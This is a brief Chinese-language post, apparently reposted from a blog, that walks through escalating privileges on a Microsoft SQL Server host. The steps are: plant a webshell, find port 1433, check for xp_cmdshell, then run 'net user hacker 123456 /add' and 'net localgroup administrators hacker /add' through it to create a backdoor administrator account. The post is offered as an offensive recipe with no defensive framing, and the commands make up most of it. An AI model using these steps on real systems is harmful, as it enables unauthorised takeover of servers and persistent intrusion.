您的位置:首页 > 运维架构 > Shell

mssqlserver xp_cmdshell提权

2017-11-30 16:36 176 查看
首先把大马上传上去,再webshell.asp上进行操作

进行端口扫描,发现有1433端口存在,说明有mssql数据库

在sql操作命令处,进行输入命令:select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell‘ 查看xp_cmdshell是否开启

添加系统账号:exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'

加入管理员组:exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: